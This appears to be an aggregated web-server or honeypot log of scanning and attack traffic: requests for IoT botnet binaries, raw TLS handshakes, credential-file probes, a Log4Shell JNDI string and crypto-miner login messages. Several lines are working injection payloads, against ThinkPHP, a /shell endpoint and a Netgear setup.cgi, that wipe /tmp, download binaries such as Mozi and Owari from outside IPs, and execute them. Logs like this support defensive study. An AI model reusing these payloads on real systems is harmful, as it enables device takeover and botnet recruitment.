1133\x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00\x03\x00\x01\xD6
1143GET /x0ox0ox0oxDefault/z0r0.arc HTTP/1.1
1153GET /x0ox0ox0oxDefault/z0r0.sh4 HTTP/1.1
1163GET /x0ox0ox0oxDefault/z0r0.ppc HTTP/1.1
1173GET /x0ox0ox0oxDefault/z0r0.mips HTTP/1.1
1183GET /Yboats.sh4 HTTP/1.1
1193GET /Yboats.ppc HTTP/1.1
1203GET /vv/armv6l HTTP/1.1
1213GET /Yboats.arc HTTP/1.1
1223GET /hiddenbin/boatnet.m68k HTTP/1.1
1232GET /splmips HTTP/1.1
1242GET /nabarm5 HTTP/1.1
1252GET /jklsh4 HTTP/1.1
1262GET /nabx86 HTTP/1.1
1272GET /nabmips HTTP/1.1
1282GET /nabmpsl HTTP/1.1
1292GET /splarm7 HTTP/1.1
1302GET /splarm5 HTTP/1.1
1312GET /dniapi/userInfos HTTP/1.1
1322GET /nshmips HTTP/1.1
1332GET /nsharm HTTP/1.1
1342GET /nshppc HTTP/1.1
1352GET /nsharm5 HTTP/1.1
1362GET /localhost/.env HTTP/1.1
1372GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
1382GET /nshkarm6 HTTP/1.1
1392GET /hidakibest.mpsl HTTP/1.1
1402GET /hidakibest.arm6 HTTP/1.1
1412GET /hidakibest.x86 HTTP/1.1
1422GET /hidakibest.arm5 HTTP/1.1
1432GET /hidakibest.ppc HTTP/1.1
1442GET /hidakibest.sparc HTTP/1.1
1452GET /mipsel HTTP/1.1
1462GET /m-6.8-k.Sakura HTTP/1.1
1472GET /main_sh4 HTTP/1.1
1482GET /main_ppc HTTP/1.1
1492GET /sparc HTTP/1.1
1502GET /main_arm5 HTTP/1.1
1512GET /gif HTTP/1.1
1522GET /main_x86 HTTP/1.1
1532GET /main_mpsl HTTP/1.1
1542GET /yakuza.x86 HTTP/1.1
1552GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
1562GET /Mozi.m HTTP/1.1
1572GET /miner HTTP/1.1
1582GET /bins/arm6 HTTP/1.1
1592GET /bins/mips HTTP/1.1
1602GET /yakuza.arm4 HTTP/1.1
1612GET /t/mips HTTP/1.1
1622GET /verbindungstester.js HTTP/1.1
1632GET /main_mips HTTP/1.1
1642GET /LjEZs/uYtea.sh4 HTTP/1.1
1652GET /LjEZs/uYtea.arc HTTP/1.1
1662GET /LjEZs/uYtea.ppc HTTP/1.1
1672GET /LjEZs/uYtea.m68k HTTP/1.1
1682GET /LjEZs/uYtea.mips HTTP/1.1
1692GET /powerpc.nn HTTP/1.1
1702GET /yakuza.m68k HTTP/1.1
1712GET /LjEZs/uYtea.arm7 HTTP/1.1
1722GET /LjEZs/uYtea.arm5 HTTP/1.1
1732GET /nabsh4 HTTP/1.1
1742GET /splx86 HTTP/1.1
1752GET /zerarm7 HTTP/1.1
1762GET /arm HTTP/1.1
1772GET /arc HTTP/1.1
1782GET /arm6 HTTP/1.1
1792GET /sh4 HTTP/1.1
1802GET /t/arm5 HTTP/1.1
1812GET /mpsl HTTP/1.1
1822GET /t/arm6 HTTP/1.1
1832GET /t/mpsl HTTP/1.1
1842GET /t/sh4 HTTP/1.1
1852GET /t/arm HTTP/1.1
1862GET /bins/arc HTTP/1.1
1872GET /bins/arm HTTP/1.1
1882GET /sshd HTTP/1.1
1892GET /zd/arm6 HTTP/1.1
1902GET /websso/SAML2/SSO/vsphere.local?SAMLRequest HTTP/1.1
1912POST /mifs/j_spring_security_check HTTP/1.1
1922GET /x86_64 HTTP/1.1
1932GET /zd/arm7 HTTP/1.1
1942GET /zd/arm HTTP/1.1
1952GET /zd/ppc HTTP/1.1
1962GET /x86 HTTP/1.1
1972GET /tmips HTTP/1.1
1982POST /api/login HTTP/1.1
1992GET /bins/arm5 HTTP/1.1
2002GET /zd/m68k HTTP/1.1
2012GET /zd/spc HTTP/1.1
2022GET /ee/armv7l HTTP/1.1
2032GET /tt/armv7l HTTP/1.1
2042GET /ee/armv4l HTTP/1.1
2052GET /vv/mipsel HTTP/1.1
2062GET /tt/armv4eb HTTP/1.1
2072GET /tt/armv6l HTTP/1.1
2082GET /tt/arc HTTP/1.1
2092GET /vv/armv4l HTTP/1.1
2102GET /tt/mipsel HTTP/1.1
2112POST /wp-admin/admin-ajax.php HTTP/1.1
2122GET /vv/armv7l HTTP/1.1
2132GET /yakuza.mips HTTP/1.1
2142GET /bins/m68k HTTP/1.1
2152GET /bins/arm7 HTTP/1.1
2162GET /Yboats.m68k HTTP/1.1
2172GET /x0ox0ox0oxDefault/z0r0.arm7 HTTP/1.1
2182GET /zd/arm5 HTTP/1.1
2192GET /Yboats.x86 HTTP/1.1
2202GET /?x=${jndi:ldap://${:-131}${:-904}.${hostName}.uri.cvdlqtvdueihu608mbb0y7ayby6o18icu.oast.site/a} HTTP/1.1
2212GET /i HTTP/1.1
2222GET /zd/aarch64 HTTP/1.1
2232GET /x0ox0ox0oxDefault/z0r0.arm5 HTTP/1.1
2242\x04\x01\x01\xBBh\x156[\x00
2252POST /cgi-bin/luci/;stok=/domain_login?form=dlogin HTTP/1.1
2262GET /Yboats.spc HTTP/1.1
2272GET /s/arm7 HTTP/1.1
2282GET /s/arm6 HTTP/1.1
2292GET /s/mipsel HTTP/1.1
2302GET /arm4 HTTP/1.1
2312GET /Mozi.a HTTP/1.1
2322GET /nshksh4 HTTP/1.1
2332GET /hmips HTTP/1.1
2341\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03;\xEC~\xEB\x93\xA6V-t\xC9\xC6b-\xA31\xDE\xDC=0\x8F’n\x93\x127\xA4\xC2
2351c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00OISYSNEC\x00\x00\x00\x00
2361\x00\x0E\x08]E\xE8\xF9\x17\xAF\x83\xDA\x00\x00\x00\x00\x00
2371\x00\x0E8]E\xE8\xF9\x17\xAF\x83\xDA\x00\x00\x00\x00\x00
2381GET /getcfg.php HTTP/1.1
2391GET /proc/.env HTTP/1.1
2401GET /run/.env HTTP/1.1
2411GET /boot/.env HTTP/1.1
2421GET /nmaplowercheck1742501260 HTTP/1.1
2431GET /pSd5 HTTP/1.1
2441\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\x8B\x81\xF3\xFE\xCB\x03#\xD0\x0B\x1CX)\x19\xD2\xC3A\x8C\x8E\xD0\xCA\x9C\x0F\xE3\xE2\xDF\xF4\x16w/\xD3\x88\x03 \xF1\xDF\xAD\xFC{zW\xA67\xE2\xD8\xD2R\xDBl\xCE=(\xDF\x83\xC6=\x22\x11\xB3\xBB\xC2\xCD\xD9\x10\xFFO\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
2451\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\xA6\x83\x06\xFD\x1B\x1E4s\xE9\x87\xC8\xFF\x00Ij\x9F\x03\xF3\xD3*!\x7F\xED\xB9;1?\xF8\xF9q\xA9\xD0 r\xDA\xFF6\xCF\x06
2461MGLNDD_88.151.192.19_80
2471GET /Nmap/folder/check1742501260 HTTP/1.1
2481GET /api/v2/about HTTP/1.1
2491GET /NmapUpperCheck1742501260 HTTP/1.1
2501\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xBEw\xAC\x11\x96\xF6_#\x89?\xE0\x0F=\x97\xACT,\x1F\x1Cd\x03\xA5\x11\xF9\x9F\x85\x0F\xFF\xF6\x5C\xDDL\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2511\x16\x03\x01\x00\x8C\x01\x00\x00\x88\x03\x03\xFCC\xE1\xCD\x22\x01\x1C\x07\xA0\xAA&\xC9\xD7\xB0\xDC\xCC\xA5\xEA\xB0P=.\xC4\xD4.m\x18\x86\x95)\x17\x1C\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2521\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xAFBUxpj\xBC\xC3\xC2J\x8B\xA3\x1D\x03rvW\xF5\x98\x83\xE5\xA1s\xE9\x8C\xE7\x0F\xF5d\xF2\xDBM \xBDA\x97d\xA8\xA4\xCCo\x07\xD2D\xAC\x80\xFE\xB1\xEEM*\x0C;\xB5a\x7F\xF9\x08\xDE\x0ChgeC\x04\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2531\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x034\xF3\xF0\xE0\xD3\xDBB\xB5=\xB7MY\x8B\x95]\x80\xDA\xB4lT\x13\xB2\x7F\xC5\xD9wd\x9C\xEEL8 \xE9\xF1n\xA3\x8B\x83N\xAC\xDD\xD2\xC9c\x8Af\x01G\xA2]\x09n\x1D\xC6\x1C\xEF}\xE3\xD0b\xFB\x03\xCC\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2541\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03T\xC7\x98)2\x1ACZnQ\xF9\xE9\xF9~\xF9s\x81\x0E\xDA\x96\x0Cr@W\x09\x88\x8C\x05a\xA6\xEE\xBC x>\x0E\xCE\x90Z\x03\xA7\xE4P
2551GET /fAEq HTTP/1.1
2561GET /b5Sr HTTP/1.1
2571GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1
2581GET /r-seenet/index.php HTTP/1.1
2591GET /versions HTTP/1.1
2601GET /allversions HTTP/1.1
2611GET /login/login.html HTTP/1.1
2621GET /tos/index.php?user/login HTTP/1.1
2631\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xA5(3\xEEB\xB2V\xD9\x16\xE5\xB5\xCEwf\xF2\xA9\x1F5\xE1\xED_\x12\x98v\xBB\xEFP;Q\xBFe \xDAhL\xF8\xC5\xFE\x0F\xE5\xB8\x0C=\xB9\x88XY3\x88\xFD\xBA\xD2\xFC\xBDY\x99\x17\xCFH&\xDB\x22\x10\x06\x00\x9C\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0\xC0V\xC0R\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\xC0
2641\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEB\x7F\x07\xC2\x85Q\x13\x13\xFE\xF7\x93O\xE3\xBC\x1D\x5C\xF9\xE5\x90\x07^t\xF0\xD6\xC2\xB6\x10\xE7\x8A\xA5fk\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2651\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xC5i2\xE6u\x1Em\xDEy)%\xD9<9!\xDE\xD5\x87\x8E\x92^\x9E)?\xAC\x1D\xC6\x17\xEE;‘N \x90\xCD
2661\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xA6\xEB\xF5r\x1B\x04\x15\x06*\xE4\xD5\x99>\xB2y\x86\xAA’\xF1\x0C\xC0\xF4\xA0}\xB9\xA3\x16\x03\xAAq\x83.\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2671\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCEhd\x91B\x03\xBCO\xE3e\xA6J\x18\xC0?\xD9\xEE\x88\xA5\xC1\xB3\x03S\xA9\xC4X\xCF\x9C\xF8\xD7\x903\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2681\x16\x03\x01\x00\x8C\x01\x00\x00\x88\x03\x03E[\xD0$\x98x\x1B\xCC\xD3C\x8B=\xA6w\x9Cp\xDB\xF8%V\x10\xA4\xC2Y\xF7.1\xEA\xAFL\xE6\x90\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2691\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x9D#\x04\xC8\xEA\x84b\x09\xD3Q\xA57\xEBK\xBB\x0B=\x1A\xF0\x8C\x91yM\xE1\x7F\x1A\xDC\x8CM\x0Bj\x1D\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2701GET /Module1/js/Module_b1827afbcecf98cd0e40b9ee2187b3ac.js HTTP/1.1
2711\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xE4\x0C\xCBV\x88{\x1AO5*\xDE\xFE\xFD\xA9\xAF\xD0\x19\xAFHn;\xD38\x1F\xC3\xF3\x89m\xECo\xDC\xB4 \x85\xED\x9C1n\xE9\xF3\xE5\x9F\x96J\x11zU\xC2}\xC4\xCC\x1FJ\xC1\xB6\x22\x1BT\xF3\x8F\x0Cc\x85\x84\xF2\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
2721GET /Module1/js/Module_721fbc57271715f9b2d038cdff508ce6.js HTTP/1.1
2731\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE6r\xFEi\xFA\x80\x0E\x86\xE0\x9C\xB5\x9E:(\x9B\x1B\xC1n\x01\xA5\xFC\x81\x191d\xEC6\xBA0R\x9E#\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2741\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCFg\xAE\xC2\xFD\xDB\xAB\xFEbXF5xF\xAD\xBE\xC6\xCC\x91\x83\xB5m\xD6\xEA\x85pp\xCB\x8F\xA9\xC50\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2751\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCAEC\x0FhO\x9ARh\x12\x19\x94lt\xCF\x96<\xFEG\x9F\x88\x0C\x9EH\x82T\xFB\xECW\x86\xD1\x00\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2761OPTIONS rtsp://xxx.xxx.xxx.xxx:80 RTSP/1.0
2771GET /level/15/exec/-/sh/run/CR HTTP/1.1
2781\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xD7S\xB4\xB8\x8D^\xD4\xF8\xE3[\xC1F\xDF\x17\x19K\x0B\xAE\xDC
2791\x16\x03\x01\x00\xC6\x01\x00\x00\xC2\x03\x03{%\x81\xF8\xCE\xF9\xFB?\xAB\x9D\xD8;\xA5\xFF\xB1_E\x0F\xF9\x87\xD8\x12cz\xEA\xA0\xB5\xEF\x84\xCE[~\x00\x00P\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2801\x16\x03\x01\x01$\x01\x00\x01 \x03\x03\xCCYw-\xE4\xB3l
2811\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x9Dc
2821GET /Odin/http/call1742473322 HTTP/1.1
2831GET /OdinHttpCall1742473322 HTTP/1.1
2841GET /odinhttpcall1742473322 HTTP/1.1
2851\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03q\xDA\x7F\x1D\xFC4\xCEr\x8D\x84\xC7\x98\xA3\xC2\xB2\xA0\xEFg\xE0C\xD4\xF3
2861\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x06\xF7L\xE9\xB7@\xA1\xCB\xE6\xC5\xE6\xF6\xF1\x9Bx\x1C@\x18\xF2\x9A\xA5\xFD\x15P\x0C+\xA3\xB1\x1E\x08\x06\x95\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
2871\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03]\xB5\xB0\x9F/\xB6;\x85\xC0\xFB\x8FT\xFB\xDC\xF2j=\x04\xD05\x97\x8Ep\x12\x08\xAFi\x00\x1A\xC7\xAC\xDF \xDE+f\xD7`\xA5\xD9
2881\x16\x03\x01\x00{\x01\x00\x00w\x03\x03s0\xC6\xC0\x0EW\xA3\x9A\xB7^\xCCM\xBB\xB9w
2891\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x05.\xC9^\xBB\xDD\x1F\x1B\xFB\xB5\x99\xE8\xB0X\xFF\xD9\x03\x0F\xDB\xEAn\x122\xE2l\x1F\x1A<s\xE0\xA6\x13 u\xAA\xFD*\x99\x8E\x86\xF7.\x0B@\x81\x98y\x14\xCB\xB3\xF9\xC0\x83\xF6\xE9\xA4+\xBE\xD6w\x04d\xAC\xE8\x03\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2901\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03YH\x82Q\xAA\x89\xA8]\x03\xAC\xEDvu\x0B\x03\xD4\xF0\xF4\xA4\x9E\xA3(\x5C]\xF8t/\x1F\xE9z\x13{\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
2911GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&232ZF=33ELO HTTP/1.1
2921GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&3G3SF=0ZT25 HTTP/1.1
2931GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&BGT5A=AUA0J HTTP/1.1
2941GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&HO8DN=XJSPA HTTP/1.1
2951GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&3PZTR=1XD09 HTTP/1.1
2961GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&QBNUD=4UK23 HTTP/1.1
2971\x16\x03\x01\x05\xC4\x01\x00\x05\xC0\x03\x03a\x93\xDC\x95\xB9\xFC\xCA\x0B\xEB\xE2\x9A,\x85i\xE4\x19\x06
2981POST /api/user/binLookup HTTP/1.1
2991GET /api/bin/440393 HTTP/1.1
3001\x16\x03\x01\x00\x8A\x01\x00\x00\x86\x03\x03lO4\x89\x8E\xC0\xB6\x06
3011\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEBY\xEB\xFEq\x97\xB6E\x9BM1z\x85\x1B`=\xBD\xB5\xAD\xA8\xC4\xE5p\x93\xC8\x06<\xAANe\xD6\xD1\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3021\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x87\xE6\x8F0P\x04@\xDA=#\xDB\x88\x19\xBB\x8EN\xD2\xD2\x9FN\x93w\x06=\xCD\xB8\xBA\xEF\xA2\xEF2\xB0\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3031\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x90\x1D:k\xBA\x9Dh\xA2t\x88\x11p\xEA\xEE\x87\xB9Z\x16\xE4\xFF\x09\x1A\x07\xAE\x0F\xFE\x82#p\x8E\xDC\xB3 \xCEs~\xBEh\xC0\xB7k\xC4\x84\xEAXy_\x9E\x06s&\x1C\x9D6M\xE8\xE8\x1BCz\xF3\xF8\xF3q\xE9\x00>\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0+\xC0/\x00\x9E\xC0$\xC0(\x00k\xC0#\xC0’\x00g\xC0
3041\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03x:]\x19\x8A&\xC6\xA2E\xDB\x03)a\x8F\xA8\xF8\x7F\xE8O^\xAD\xBFe\xE3\x83_\xCFC\xD1\x11\xFA\xC8 \xCA$=\x1FFkM\xB9?\xC6\x85\x1A5:\x9D\xBC\x14\x1B\xD3\xAC\x04g\xEB\xCB?\xAF\x18\xEC\xBC\xB6\xB0\xEE\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
3051\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03e\xAE\x5C\xDA\x9E\xD1\xE8f\x96)e\x95t\x1E\xD0{\xEFI\xDB\xDE\x1E\x5C\x16ps\xFE\x1D\x8E\xAD9’\x0F\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
3061\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xDB\xD1\x1C\xB0\xC8-w\x18jO\xAF\x9F*J\x9A{.\xD7oI\xD3c\xF2\xAA\x8C\xA4\xDE\xB1&\xE28\x98\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3071\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x83\x1F\xEF’\xEFg\x9A\x01\xBA$\x18\xA4\x1B\xB1\xCE]\xAA\x22\x0E#I:x\xACr\xA5O\xC6\xDDx\x19&\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3081\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xAD\x1D$Ar\xF7\xEF\xA0E\xD0+\x0C\xF7@)\x9Dr\x139\xA1\x84i\x86q\xB3V\xCF\xCAB\xCE\xE5j\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3091\x00\x0E8\xC6*$\xFE\xD3\xE9\x87\xAE\x00\x00\x00\x00\x00
3101\x00\x0E\x08\xC6*$\xFE\xD3\xE9\x87\xAE\x00\x00\x00\x00\x00
3111GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.48:10756/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
3121\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03uMj\xD7`\x94\x1C\x5C\xA0\xB0\xEA\x00\xC7Y\x06\xB3\xB2)i\xBB\xAF\xFE0\x88\xBCt\xCD\xAE%a_\x8F \xCB\xE7\x12#\xA3\x0BZ\x16g\x18\xAE\xC1<\xBE+8.Y\xE4Q\xC2$$\xA9\x5C\xDF}
3131\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03w\xC7<\xF3\x12\xD31e`\xB6\x86\x98\xDA\x96\xF7X\x9A\xFB\xA9\xA7\xFEO\xEDb\xAA\xA2\xCE\x95\xB6\xF3D\x91 \xBE\xFA\xED’vB\xDE\x19\xB0\x11\xEF7\x87\x1D\x8E9\xBD\xD0\xF0E\xBD\xAF\x90\xE1L\xA9:\xA1\xB3\xED\x9Fh\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
3141\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEE\xA2z\xAE$\xA3’\x0EA\x81A\x17Q1\x01\xAF\x13n\xFDl \xBF\x85\xE6\x09Q\xDE\xE2\xD1oT\x5C :\x93\x86f\x96\x1F\xB4&\xD7\x8D\xACgL\x94\xD2\x9CF\x1D_\xACW\x97\x04{lW2p#\xF7O\xEF\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
3151\x16\x03\x01\x00\x8D\x01\x00\x00\x89\x03\x03\xCFe9]\xE6\xB1u)\xDF\x83EV(\xC0\xD8
3161GET http://www.msftncsi.com/ncsi.txt HTTP/1.1
3171{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2245oSjnnvS9AAuQYEdkoCvUdUwWWrUhogLhvoW2qJrUNx6P3vYsUthyw7bysu56Nd25cJRxBJ9XcaHbPyyq9x7KEuB85dRzn\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
3181{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x4da47909d8e5dfae65cbe8bb3735ea3ce37478cf\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
3191\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03}\x1C\x8F\xFC\xABX\xF1\xA4L\x90\x05@\x5C\x14\xF4\x07\xFF5\xDC.
3201\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03fo\xF6`\xB2\x91U\x87\x03\x8C\xA0~\xA7\x04\xE0\xBF
3211\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xBF\xD1\xEF\xBEKkLWGd]F\x07\x80
3221\x16\x03\x01\x00\xE2\x01\x00\x00\xDE\x03\x03>e\x99\x06\xFDV\xB4@\xD0\xC1\xF6\xF5o\x06\xCA?\xD9\xC7\xADe\xDB\x88\x06m0u\x9C\x82\x07\x91\xBAu \xB1\x92;\x83\x1F’\x15{F\x12\xEE\xA6\xFB\x92\xB0\x9B’]\x80\x13I\xF7$F\xF0Oke!\x00](\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
3231GET /v1/models HTTP/1.1
3241\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03)\x96\xAC\xED
3251\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xF62\x8D\xFC\x7F\x1F\xA1\x01\x82\xBE1\xA2\x22\xB5v\x98U\x0E\xC8\x80\xAAb\x5C\xCBx\xDD\xCA4L\xB2KC \xB0\x01#1\x09\x7F\xA30\xAF\xC8\x82\x87\x8E2Hrtkv\x8FP\x838\x17\x00N[\x15\x9Br\x0C
3261\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03c\xB9(\xC2\x96\xA3qn\xEEG\x90\xDA6\x92\x16\xA2\xD6\xFF\x05\x07\x058k\xCFN\x85\x85\x9B\xEE\xB8\xB9\xF4 \x09\xCFq\x9Bk\xAE\x87\xB0\xCF\x82rw\x0EI\xF5\xBB\xB4\xD1d\xFBm\xA9\x83\xB8B@x]\xD2\x10\xB3\x12\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
3271\x16\x03\x01\x00\x8C\x01\x00\x00\x88\x03\x03’W\xEE\xDB$s8\x0E\x88\x84\xFB\x96\xB4\x8C\x005c\xAA\xDE\x8Bw\x0C\x82U?\xB1\x1C\x99y\x9F\xCB\x19\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3281\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\xFA\x8Db\x862\x12\x7FSBf\xCE\xF2\xC1\xE8\xE1Wd
3291GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
3301GET /Module1/js/Module_d845871a764a853ae06b7b557e432bf9.js HTTP/1.1
3311\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xA1#\xD1\xDD\xDF\x14\xC3\x17\x0F=$\xDE!\x9B\xD1
3321\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03@\x0F2\x9Cj72\xBC\xE2\xC4\x9B\x1C\x96?
